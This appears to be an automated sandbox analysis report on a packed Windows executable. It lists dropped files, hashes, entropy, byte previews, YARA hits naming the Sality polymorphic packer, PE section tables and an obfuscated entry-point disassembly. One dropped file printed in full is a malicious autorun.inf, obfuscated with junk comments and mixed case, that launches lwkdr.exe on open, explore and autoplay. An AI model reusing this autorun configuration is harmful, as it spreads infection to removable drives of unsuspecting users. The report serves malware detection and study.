                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:modified
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):82944
                                  Entropy (8bit):7.980431856779428
                                  Encrypted:false
                                  SSDEEP:1536:9Gq2mRNeHxNE8VGOE1xjGXXNyJUgcft45w6Olp9ryFONh8WOQPivgg7eV:cq9MHojOJ9Jl8vObxyFONS+iz72
                                  MD5:897A7E55A96EC2554B92B33629D4C23B
                                  SHA1:DE33D0FD1FDF368309E91BF146C54B11A8731AC0
                                  SHA-256:26C164ABE9DF5ED67EC1F2853E13C543136078B15EF081834FD27AB7F0E2C904
                                  SHA-512:B19D45007BCFF92CC4563D8C9F068E2681A7F885C0BF70A334A5A76FFCB037EB3907625937035463231C930D5A6058F5D48AE7A3A2B3D1E41DED0ADFC06A16B5
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\Users\user\AppData\Local\Temp\winxmkqo.exe, Author: ditekSHen
                                  Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................`..............................................`...<....................................................................................................................text....P.......B.................. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............[.....S.......f.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):258
                                  Entropy (8bit):7.284780829056715
                                  Encrypted:false
                                  SSDEEP:6:EGGrshSV4EmRJBY9aqgbSKoD9ih7lZDlezcHZ47l7q2w32:EGGAhSuC9albSKa9illezcW7L
                                  MD5:88D20B23F81FA97A852263FC732277F8
                                  SHA1:9F739F07E8827D6850593B4358FE4AB0D9A5FF79
                                  SHA-256:B2C202F638284DCA99822379F447FC45100F0EA2AA3E19DBAD8DD47F55ADF033
                                  SHA-512:458B5103762FAAE5FD47BBEBBA479551DB8D9C3C3E5F9D77671E1D05AF1FE00750D3FA6DFB34C4799245A0402F8446C82B1FFC4890FAA294AA0C6E9976EBF2E6
                                  Malicious:false
                                  Preview:.M.4..{.}...Y......r..~.3.d..A......$..a76W.W;.....I:....JFc...,.R_L00r.R+%./....r..K.%.M....w.iKn;.. ...{.H{..];.._..`<..<...M.].....{..F...t5m...b....e....^.D.3.n.C.j.........?..%?!e.Z=.v.Q,.S......DVji#........{.&.f.S..).(..J.<......|*...|..b.
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):340
                                  Entropy (8bit):7.428989227311812
                                  Encrypted:false
                                  SSDEEP:6:gZJO5bFL66/NU/K/8co34DbynLoaqRQs/Cb9rbJVoHwsrgbFRFhNMod7:gbQFWtG8cxbyLFjb9rbJihrcRFhNMM
                                  MD5:2516CA1835F985ADEAB21CFBC34FF724
                                  SHA1:84D5608CFC6ADDA355587C0EC9824879404316EF
                                  SHA-256:85E67D6B1FD7741E4AF758EE5E108DDE1432D414CBF34B18BAA417044EB8EAC1
                                  SHA-512:B0D3CF50931C5794A0584895911F15F6F2B44244C55AD0FF75C020C18BC3599D2C736D7608A11AE54F9D369B4718769C726FEBEF37EDDAA76F632E5AB487ADE6
                                  Malicious:false
                                  Preview:9.?...h.q.I......;4.\...*CJ.. ..C.gN."..v.v.^].!.Qr...U..RM.......g..T$8..,....Y[f].....'..S..%..8._..n.Dx...&.....a....0=..........2.[.qki.1...0...-wW_.8.:sP.O.&..........8V....^E..?N.H.!Mk<wo.......0v..N.y....z..z...q....I.R8`........S........o.P57..,.n.".c...8....MjD.q-`..m.Xg......u.~..9.p.AQ%cE..z........F..rt...A.-....
                                  Process:C:\Users\user\AppData\Local\Temp\YMZwp.exe
                                  File Type:MS Windows registry file, NT/2000 or above
                                  Category:dropped
                                  Size (bytes):1835008
                                  Entropy (8bit):4.391151834321063
                                  Encrypted:false
                                  SSDEEP:6144:5l4fiJoH0ncNXiUjt10q0G/gaocYGBoaUMMhA2NX4WABlBuN1xOBSqa:P4vF0MYQUMM6VFYLxU
                                  MD5:D2CC2CAF2C52B22A84753C3D19D7DA76
                                  SHA1:56D23BB2ED1CF817074CE049484AB27DB72A2E2D
                                  SHA-256:5C1C7DAB98E5625F4C964E49E7A5D4C0F0533F479D5CDD3E8E2E0D77FAF8C58A
                                  SHA-512:FB90C2CFBABA3D2885A89FABBB60A9C57A7BF61529438A80620C81193817BA23026E5FEB340758D35E55AEFBED64D9C9266208A076AF6E302769C3D850D08249
                                  Malicious:false
                                  Preview:regfG...G....\.Z.................... ....P......\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm..u..................................................................................................................................................................................................................................................................................................................................................+c.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:Windows SYSTEM.INI
                                  Category:dropped
                                  Size (bytes):255
                                  Entropy (8bit):5.274405989720487
                                  Encrypted:false
                                  SSDEEP:6:aQ44VvYkDyyp3BYf1fyBcfjfKvcie0xTqFtP4y:F4Yv7yk3OUBq82wqFtP4y
                                  MD5:FBE06591B91AFAF5DDB4A97A0FA14C7D
                                  SHA1:8AD8A0DD223A2BE8F031C4A49A149915E510981D
                                  SHA-256:C8C0763FCF7B25823CE17806B4CE10953AB15CA537E72D5659EECA0B901E0A11
                                  SHA-512:0D8F5EB3DE4B4032B0F2382CA550559BF178711A2F8FEA70BEC039E5C2A1496B1EA239268D1786B70245A319EAB9A596DAC2978677B57073E9543135DC2B1DB0
                                  Malicious:false
                                  Preview:; for 16-bit app support..[386Enh]..woafont=dosapp.fon..EGA80WOA.FON=EGA80WOA.FON..EGA40WOA.FON=EGA40WOA.FON..CGA80WOA.FON=CGA80WOA.FON..CGA40WOA.FON=CGA40WOA.FON....[drivers]..wave=mmdrv.dll..timer=timer.drv....[mci]..[MCIDRV_VER]..DEVICEMB=53263431135..
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:Microsoft Windows Autorun file
                                  Category:dropped
                                  Size (bytes):312
                                  Entropy (8bit):5.585297651980641
                                  Encrypted:false
                                  SSDEEP:6:S3nFegfsd+bLSKCfVTwUnwNd7qvmNExPd/UEtNO0Vq9gCiPLO7Ny:ysg3v5OTwUnwNd7qaUPdlOyPy7Ny
                                  MD5:CB7505D71F2E1994B1DEF5AE1BA4E46A
                                  SHA1:07C351AEFA8AB42696654096FF25AC374F4FFFD6
                                  SHA-256:0D03D23296CEC0AF8BAE943BEBA4E4A9E63E43653CDCA3897FCC1ACB756DAE9F
                                  SHA-512:35707548F03ED6366F732930C509B9865160C962B1E96516104E5115685F70AE91E5259FFE8915E68C1114DAC0ABCC81E93ED79F3E43477FFC4F9C731EA80EBA
                                  Malicious:true
                                  Preview:[AutoRun]..;cJKyvnrixyhEhW AOxxM..Shell\opEn\DeFauLT=1..;UhPKXXoJTnOpphwSHETkxoeBfMswrcAIUkKfnsCqhgq dgAhq..shELL\ExpLorE\CoMmand = lwkdr.exe..;puVo ..oPEN=lwkdr.exe....;sgtiCsRMreXpNIxChbYSGFndJwDYS..ShELl\open\cOmMAnD =lwkdr.exe..;xXxfHmCCJyilgSWmjh sorIQLHLdJAGdC JYVesj..Shell\AutoPLay\commanD= lwkdr.exe..
                                  Process:C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                  Category:dropped
                                  Size (bytes):103140
                                  Entropy (8bit):7.975490987238012
                                  Encrypted:false
                                  SSDEEP:3072:cq9MHojOJ9Jl8vObxyFONS+iz7z28ykVncm0:H9MHoS7lVIFuS+Y7C2ncm0
                                  MD5:4BAB7BD732DE6EBF9D46DADF074DE667
                                  SHA1:F34A89D36AB2BEC3C7D28107B930D894DDBA2B92
                                  SHA-256:2AAEE5E1950682576DC00104FB48B6BD1BABDE2BC526D98052F2B41BDBCC9286
                                  SHA-512:CF4EFEB16A557112ED7C25D654F5CCC38ADEC44CA5B4F949884F9FFC2DDDF19A823A2CFED1185E3AB877D0236FE26907F8CF4DA6B9895517A99C1DA6C8B6648F
                                  Malicious:true
                                  Yara Hits:
                                  • Rule: INDICATOR_EXE_Packed_SimplePolyEngine, Description: Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality, Source: C:\lwkdr.exe, Author: ditekSHen
                                  Preview:MZ..........PE..L...yrf<[LordPE]....................@.............@..........................`..............................................`...<....................................................................................................................text....P.......B.................. ...............................`...<....................................................................................................................text............................... ...........................................H.e.l.l.o. .w.o.r.l.d.!.....C.a.p.t.i.o.n............[.....S.......f.....@................................................................................}.ExitProcess.KERNEL32.dll....MessageBoxW.USER32.dll........................................................................................................................................................................................................................................................................
                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.920696746398092
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.66%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                  File name:#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  File size:1'233'920 bytes
                                  MD5:99901509a53dfb9c77c1be4d60763afc
                                  SHA1:920a3553a48d9d11a3b02b61d50bcd564330e173
                                  SHA256:181695ba0cdd4904f94b59450af4022fb811da81f386dca90d439f7c66566c0b
                                  SHA512:0cf6738f4c53325bfef02d225d7d297d88b264751278e776fbaabf4a5742c23015611254782475311112421418eda32a1b316283fa7b4b56946bfdd432516cce
                                  SSDEEP:24576:5yEOUslemq04P5AOoBeOa/oBj2FlaJVJZ65Gjl8Kbahu:5srqHoBeOa/oIaJs+lHmhu
                                  TLSH:D2452302C2B22E67D93B8538F32A10E3E54E8D1658625073BE5EFF8916F9BF42941D47
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......................................2.......................................2...................V...Y.......Y...............v......
                                  Icon Hash:a2aaae86ae8e86e0
                                  Entrypoint:0x638000
                                  Entrypoint Section:cu
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                  DLL Characteristics:
                                  Time Stamp:0x5F6EE09C [Sat Sep 26 06:33:00 2020 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:4
                                  OS Version Minor:0
                                  File Version Major:4
                                  File Version Minor:0
                                  Subsystem Version Major:4
                                  Subsystem Version Minor:0
                                  Import Hash:98ee450359fb8eda1fdf6c76521f661e
                                  Instruction
                                  sub edi, 3F334B51h
                                  sbb bl, cl
                                  sub eax, ebx
                                  and bh, ch
                                  inc eax
                                  imul ebp, ebp
                                  add dh, FFFFFFFFh
                                  test ebp, ebx
                                  sbb ebx, edi
                                  mov ebp, ecx
                                  inc ecx
                                  sub esi, 000081DCh
                                  mov bh, FFFFFFA9h
                                  adc edi, ebp
                                  xchg bl, bh
                                  xchg ch, bl
                                  cmp ebp, ebx
                                  jnc 00007F3F1880C0E8h
                                  mov edx, 28FAC94Bh
                                  call 00007F3F1880C0E5h
                                  or dh, FFFFFFE9h
                                  xor edi, ebx
                                  xchg ch, bh
                                  test eax, edx
                                  test eax, ecx
                                  or ecx, ebp
                                  mov dh, 16h
                                  dec bl
                                  cmp esi, 00006DC6h
                                  pop edi
                                  and ecx, 8912F310h
                                  mov al, bh
                                  lea ecx, dword ptr [A0A5FC0Bh]
                                  add edi, 00005AA2h
                                  inc edx
                                  lea ebp, dword ptr [35C17C13h]
                                  sub edi, 00000A0Dh
                                  lea ebp, dword ptr [43460DADh]
                                  lea eax, dword ptr [34AE1B94h]
                                  sbb al, ah
                                  xchg al, dh
                                  imul esi, ebx, 8ADFA0EFh
                                  sbb edx, ebx
                                  lea eax, dword ptr [0000009Bh]
                                  lea edx, dword ptr [A3FA3A70h]
                                  lea esi, dword ptr [19F00371h]
                                  xor dl, dl
                                  imul eax, eax, 07h
                                  mov dh, cl
                                  dec edx
                                  xchg cl, dl
                                  add ebx, eax
                                  dec edx
                                  add ebx, 00000091h
                                  jne 00007F3F1880C0E4h
                                  and edx, ecx
                                  lea eax, dword ptr [6FC01310h]
                                  inc ebp
                                  xor edx, 000033DCh
                                  Programming Language:
                                  • [C++] VS98 (6.0) SP6 build 8804
                                  • [ C ] VS98 (6.0) SP6 build 8804
                                  • [C++] VS98 (6.0) build 8168
                                  • [ C ] VS98 (6.0) build 8168
                                  • [EXP] VC++ 6.0 SP5 build 8804
                                  Name | Virtual Address | Virtual Size | Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x2261d8 | 0x2c4 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x224000 | 0x21d8 | .rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                  UPX0 | 0x1000 | 0x123000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  UPX1 | 0x124000 | 0x100000 | 0x100000 | 03ef3942214809a5c7f1fdbf3a77b3d0 | False | 0.9743185043334961 | data | 7.924552696829606 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc | 0x224000 | 0x14000 | 0x14000 | fbd1380d886d6fff83c6f5b97f5a8cb7 | False | 0.89351806640625 | data | 7.708524676179253 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  cu | 0x238000 | 0x19000 | 0x19000 | 3e547cae9ca476aa654971ec923e3dfb | False | 0.9282421875 | data | 7.774178931521131 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                  TEXTINCLUDE | 0x21abf4 | 0xb | data | Chinese | China | 1.7272727272727273
                                  TEXTINCLUDE | 0x21ac00 | 0x16 | data | Chinese | China | 1.4090909090909092
                                  TEXTINCLUDE | 0x21ac18 | 0x151 | data | Chinese | China | 1.032640949554896
                                  RT_CURSOR | 0x21ad6c | 0x134 | data | Chinese | China | 1.0357142857142858
                                  RT_CURSOR | 0x21aea0 | 0x134 | data | Chinese | China | 1.0357142857142858
                                  RT_CURSOR | 0x21afd4 | 0x134 | data | Chinese | China | 1.0357142857142858
                                  RT_CURSOR | 0x21b108 | 0xb4 | data | Chinese | China | 1.0611111111111111
                                  RT_BITMAP | 0x21b1bc | 0x16c | data | Chinese | China | 1.0302197802197801
                                  RT_BITMAP | 0x21b328 | 0x248 | data | Chinese | China | 1.018835616438356
                                  RT_BITMAP | 0x21b570 | 0x144 | data | Chinese | China | 1.0339506172839505
